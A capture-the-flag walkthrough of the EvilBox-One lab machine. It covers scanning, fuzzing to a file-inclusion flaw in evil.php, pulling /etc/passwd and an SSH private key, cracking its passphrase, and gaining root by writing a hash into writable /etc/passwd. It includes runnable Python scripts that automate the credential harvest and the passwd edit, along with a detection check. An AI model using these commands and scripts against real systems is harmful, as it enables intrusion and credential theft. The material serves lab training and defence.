Port recognition with nmap, or you can use recon

┌──(root@ghost)-[/home/ghost]
└─# recon evilbox.vuln

    .o oOOOOOOOo                                            OOOo
    Ob.OOOOOOOo  OOOo.      oOOo.                      .adOOOOOOO
    OboO"""""""""""".OOo. .oOOOOOo.    OOOo.oOOOOOo.."""""""""'OO
    OOP.oOOOOOOOOOOO "POOOOOOOOOOOo.   `"OOOOOOOOOP,OOOOOOOOOOOB'
    `O'OOOO'     `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO'    `OOOOo
    .OOOO'            `OOOOOOOOOOOOOOOOOOOOOOOOOO'            `OO
    OOOOO                 '"OOOOOOOOOOOOOOOO"`                oOO
   oOOOOOba.                .adOOOOOOOOOOba               .adOOOOo.
  oOOOOOOOOOOOOOba.    .adOOOOOOOOOO@^OOOOOOOba.     .adOOOOOOOOOOOO
 OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"`  '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
 "OOOO"       "YOoOOOOMOIONODOO"`  .   '"OOROAOPOEOOOoOY"     "OOO"
    Y           'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?'         :`
    :            .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?         .
    .            oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
                 '%o  OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
                      `$"  `OOOO' `O"Y ' `OOOO'  o             .
    .                  .     OP"          : o     .
                              :
                              .

[R3C0N] by 0bfxgh0st 4 WWA with ❤
Whoops Team Views CVE-2022-23242 WildZarek

[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-14 07:29 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 07:29
Completed NSE at 07:29, 0.00s elapsed
Initiating ARP Ping Scan at 07:29
Scanning evilbox.vuln (10.0.2.10) [1 port]
Completed ARP Ping Scan at 07:29, 0.01s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 07:29
Scanning evilbox.vuln (10.0.2.10) [65535 ports]
Discovered open port 22/tcp on 10.0.2.10
Discovered open port 80/tcp on 10.0.2.10
Completed SYN Stealth Scan at 07:29, 1.28s elapsed (65535 total ports)
NSE: Script scanning 10.0.2.10.
Initiating NSE at 07:29
Completed NSE at 07:29, 0.00s elapsed
Nmap scan report for evilbox.vuln (10.0.2.10)
Host is up (0.000063s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:A0:CE:A8 (Oracle VirtualBox virtual NIC)

NSE: Script Post-scanning.
Initiating NSE at 07:29
Completed NSE at 07:29, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.45 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)


[+] [fuzzin server]
http://evilbox.vuln [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], IP[10.0.2.10], Title[Apache2 Debian Default Page: It works]

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Jul 14 07:29:32 2022
URL_BASE: http://evilbox.vuln:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://evilbox.vuln:80/ ----
+ http://evilbox.vuln:80/index.html (CODE:200|SIZE:10701)                                                                                                                                         
+ http://evilbox.vuln:80/robots.txt (CODE:200|SIZE:12)                                                                                                                                            
==> DIRECTORY: http://evilbox.vuln:80/secret/                                                                                                                                                     
+ http://evilbox.vuln:80/server-status (CODE:403|SIZE:277)                                                                                                                                        
                                                                                                                                                                                                  
-----------------
END_TIME: Thu Jul 14 07:29:34 2022
DOWNLOADED: 4612 - FOUND: 3

recon reports two open TCP ports, 22 (SSH) and 80 (HTTP), and its dirb pass against the Apache 2.4.38 default page finds robots.txt and a /secret/ directory. /secret/ is where we fuzz next.

┌──(root@ghost)-[/home/ghost]
└─# wfuzz -w /usr/share/dirb/wordlists/common.txt -z list,php-txt -t 500 --hc=404 http://evilbox.vuln/secret/FUZZ.FUZ2Z
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://evilbox.vuln/secret/FUZZ.FUZ2Z
Total requests: 9228

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                            
=====================================================================

000000001:   403        9 L      28 W       277 Ch      "php"                                                                                                                              
000000026:   403        9 L      28 W       277 Ch      ".htpasswd - txt"                                                                                                                  
000000025:   403        9 L      28 W       277 Ch      ".htpasswd - php"                                                                                                                  
000000024:   403        9 L      28 W       277 Ch      ".htaccess - txt"                                                                                                                  
000000023:   403        9 L      28 W       277 Ch      ".htaccess - php"                                                                                                                  
000000021:   403        9 L      28 W       277 Ch      ".hta - php"                                                                                                                       
000000022:   403        9 L      28 W       277 Ch      ".hta - txt"                                                                                                                       
000003025:   200        0 L      0 W        0 Ch        "evil - php"                                                                                                                       

Total time: 4.601635
Processed Requests: 9228
Filtered Requests: 9220
Requests/sec.: 2005.373

After fuzzing the secret directory for .php and .txt files we find evil.php. It answers 200 with an empty body (0 chars), which suggests it expects a parameter.

┌──(root@ghost)-[/home/ghost]
└─# wfuzz -w /usr/share/dirb/wordlists/common.txt -t 500 --hh=0 'http://evilbox.vuln/secret/evil.php?FUZZ=/etc/passwd'
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://evilbox.vuln/secret/evil.php?FUZZ=/etc/passwd
Total requests: 4614

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                            
=====================================================================

000000947:   200        26 L     38 W       1398 Ch     "command"                                                                                                                          

Total time: 0
Processed Requests: 4614
Filtered Requests: 4613
Requests/sec.: 0

Fuzzing the parameter name with /etc/passwd as the value gives exactly one non-empty 200 response, for "command": evil.php reads whatever file the command parameter points to, so we have a Local File Inclusion (LFI).

┌──(root@ghost)-[/home/ghost]
└─# lfienum.py "http://evilbox.vuln/secret/evil.php?command="
...
[SSH ID_RSA KEY]
mowree key from http://evilbox.vuln/secret/evil.php?command=/home/mowree/.ssh/id_rsa

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E
...
-----END RSA PRIVATE KEY-----

lfienum.py pulls a lot of information through the LFI and automatically dumps the user's SSH keys (id_rsa, and authorized_keys where readable). The id_rsa it recovers for mowree is passphrase-protected (Proc-Type: 4,ENCRYPTED, DES-EDE3-CBC), so we need to crack the passphrase before we can use it.
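The same enumeration as code, an added example that is not part of the original writeup or of lfienum.py: it pulls /etc/passwd through the LFI, derives the home directories worth trying, fetches each candidate file, and checks whether a recovered PEM key is passphrase-protected. The URL template matches the box; the candidate path list, the fake_fetch stand-in and the key body it returns are constructed so the script runs offline (swap in http_fetch for a live target).

```python
import urllib.request
from urllib.parse import quote, unquote
from typing import Callable, Dict, List, Optional

# Template observed on the box; {path} is filled per candidate file.
LFI_TEMPLATE = "http://evilbox.vuln/secret/evil.php?command={path}"

# Files worth pulling through an LFI (assumed list; {user} is expanded from /etc/passwd).
CANDIDATE_PATHS = [
    "/etc/hostname",
    "/home/{user}/.ssh/id_rsa",
    "/home/{user}/.ssh/authorized_keys",
]

def http_fetch(url: str, timeout: float = 5.0) -> str:
    """Real fetcher: GET the URL and return the body as text."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")

def users_with_home(passwd_text: str) -> List[str]:
    """Accounts with a /home directory and a login shell, parsed from /etc/passwd content."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, home, shell = fields[0], fields[5], fields[6]
        if home.startswith("/home/") and not shell.endswith(("nologin", "false")):
            users.append(name)
    return users

def lfi_enumerate(fetch: Callable[[str], str], template: str = LFI_TEMPLATE) -> Dict[str, str]:
    """Fetch /etc/passwd first, expand {user} in the candidate list, return non-empty hits."""
    hits: Dict[str, str] = {}
    passwd = fetch(template.format(path=quote("/etc/passwd", safe="/")))
    if not passwd.strip():
        return hits  # no LFI, or the parameter name is wrong
    hits["/etc/passwd"] = passwd
    for user in users_with_home(passwd):
        for tmpl in CANDIDATE_PATHS:
            path = tmpl.format(user=user)
            if path in hits:
                continue
            try:
                body = fetch(template.format(path=quote(path, safe="/")))
            except Exception:  # network error or HTTP error: treat as a miss
                continue
            if body.strip():  # evil.php returns an empty body for unreadable or missing files
                hits[path] = body
    return hits

def extract_pem(text: str) -> Optional[str]:
    """Cut the first PEM private-key block out of a response body."""
    start = text.find("-----BEGIN ")
    end = text.find("-----END ", start)
    if start < 0 or end < 0:
        return None
    end = text.find("-----", end + len("-----END "))  # closing dashes of the END line
    return text[start:end + 5]

def key_encryption(pem: str) -> Optional[str]:
    """Return the DEK-Info cipher if a traditional PEM key is passphrase-protected, else None.
    Keys in the newer 'BEGIN OPENSSH PRIVATE KEY' format carry no Proc-Type header and are not handled here."""
    if "Proc-Type: 4,ENCRYPTED" not in pem:
        return None
    for line in pem.splitlines():
        if line.startswith("DEK-Info:"):
            return line.split(":", 1)[1].strip().split(",")[0]
    return "unknown"

# Constructed offline stand-in for the box's responses (not real captured data;
# the key body below is a placeholder, not a real key).
FAKE_KEY = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E

Y29uc3RydWN0ZWQgcGxhY2Vob2xkZXIgYm9keSwgbm90IGEgcmVhbCBrZXk=
-----END RSA PRIVATE KEY-----
"""
FAKE_SERVER = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                   "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
                   "mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash\n",
    "/home/mowree/.ssh/id_rsa": FAKE_KEY,
}

def fake_fetch(url: str) -> str:
    """Offline fetcher: empty body means a miss, exactly like evil.php."""
    return FAKE_SERVER.get(unquote(url.split("command=", 1)[1]), "")

if __name__ == "__main__":
    found = lfi_enumerate(fake_fetch)  # use http_fetch against the real box
    for path in found:
        print("[+]", path)
    pem = extract_pem(found.get("/home/mowree/.ssh/id_rsa", ""))
    print("key encrypted with:", key_encryption(pem) if pem else None)
```

The empty-body check is what makes this work against evil.php specifically: the page returns 200 for everything, so response length, not status code, separates hits from misses (the same reason the wfuzz runs above filter with --hh=0 rather than --hc).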

┌──(root@ghost)-[/home/ghost]
└─# /usr/share/john/ssh2john.py key > hashed
┌──(root@ghost)-[/home/ghost]
└─# john --wordlist=rockyou.txt hashed
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn          (key)     
1g 0:00:00:00 DONE (2022-07-14 08:37) 50.00g/s 62100p/s 62100c/s 62100C/s unicorn
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

john recovers the passphrase protecting id_rsa: unicorn.

┌──(root@ghost)-[/home/ghost]
└─# chmod 600 key
┌──(root@ghost)-[/home/ghost]
└─# ssh mowree@evilbox.vuln -i key
Enter passphrase for key 'key': 
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$ cat user.txt
56Rbp0soobpzWSVzKh9YOvzGLgtPZQ

We are on the machine as the mowree user; time to privesc.

mowree@EvilBoxOne:~$ find / -writable 2>/dev/null
...
/home/mowree/.profile
/home/mowree/.bash_history
/home/mowree/.ssh
/home/mowree/.ssh/id_rsa
/home/mowree/.ssh/authorized_keys
/home/mowree/.bashrc
/home/mowree/.bash_logout
/home/mowree/.local
/home/mowree/.local/share
/home/mowree/.local/share/nano
/etc/passwd
/dev/fb0
/dev/dri/by-path/pci-0000:00:02.0-card
/dev/dri/card0
/dev/cdrom
/dev/dvd
/dev/sg1
/dev/snd/by-path/pci-0000:00:05.0
/dev/snd/controlC0
/dev/snd/pcmC0D1c
/dev/snd/pcmC0D0c
...

/etc/passwd is writable by mowree, so we can replace root's password field directly: when that field holds a hash instead of x, the system authenticates against it without consulting /etc/shadow. First generate an MD5-crypt hash with openssl (-1 selects the $1$ format):

mowree@EvilBoxOne:~$ openssl passwd -1
Password: 
Verifying - Password: 
$1$rBTHP1/l$Rd.2X0LWBHxYpDot./JmG/
mowree@EvilBoxOne:~$ nano /etc/passwd
root:$1$rBTHP1/l$Rd.2X0LWBHxYpDot./JmG/:0:0:root:/root:/bin/bash
mowree@EvilBoxOne:~$ su root
Password: 
root@EvilBoxOne:/home/mowree# cat /root/root.txt
36QtXfdJWvdC0VavlPIApUbDlqTsBM
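The privesc above as code, together with the check a defender would run for it. This is an added example, not part of the original writeup: set_password_field performs the edit done by hand in nano, and accounts_with_inline_hash is the detection (any account whose passwd field is not x, *, ! or !! is carrying a hash, or no password at all, in /etc/passwd). The sample passwd content is constructed; the hash is the one generated on the box with openssl passwd -1. The demo works on a temp file, never the real /etc/passwd.

```python
import os
import stat
import tempfile
from typing import List, Optional

def is_world_writable(path: str) -> bool:
    """True when any user can write the file (what `find / -writable` surfaced for /etc/passwd)."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)

def set_password_field(passwd_text: str, user: str, pw_hash: str) -> str:
    """Return passwd_text with `user`'s second field replaced by pw_hash.

    A hash here takes precedence: the shadow file is only consulted when the
    passwd field is 'x'. Raises if the user is missing so no duplicate entry
    is ever appended."""
    out: List[str] = []
    hit = False
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[0] == user:
            fields[1] = pw_hash
            hit = True
        out.append(":".join(fields))
    if not hit:
        raise ValueError(f"no entry for {user!r}")
    return "\n".join(out) + "\n"

def accounts_with_inline_hash(passwd_text: str) -> List[str]:
    """Defender check: accounts whose passwd field is neither shadowed ('x')
    nor locked ('*', '!', '!!'). An empty field (no password) is flagged too."""
    suspicious = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        if fields[1] not in ("x", "*", "!", "!!"):
            suspicious.append(fields[0])
    return suspicious

# Constructed passwd content (not the box's real file).
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "mowree:x:1000:1000:mowree,,,:/home/mowree:/bin/bash\n"
)
# Hash from the writeup, produced there with `openssl passwd -1`.
ROOT_HASH = "$1$rBTHP1/l$Rd.2X0LWBHxYpDot./JmG/"

def demo() -> Optional[List[str]]:
    """Write the sample to a world-writable temp file, apply the edit, re-read and detect."""
    fd, path = tempfile.mkstemp()
    try:
        os.write(fd, SAMPLE_PASSWD.encode())
        os.close(fd)
        os.chmod(path, 0o666)  # reproduce the misconfiguration found on the box
        if not is_world_writable(path):
            return None  # nothing to abuse
        with open(path) as f:
            patched = set_password_field(f.read(), "root", ROOT_HASH)
        with open(path, "w") as f:
            f.write(patched)
        with open(path) as f:
            return accounts_with_inline_hash(f.read())
    finally:
        os.unlink(path)

if __name__ == "__main__":
    print("accounts carrying a hash in passwd:", demo())
```

On a real system the same detection is one line: awk -F: '$2 != "x" && $2 !~ /^[*!]/ {print $1}' /etc/passwd, and the fix for the root cause is chmod 644 /etc/passwd.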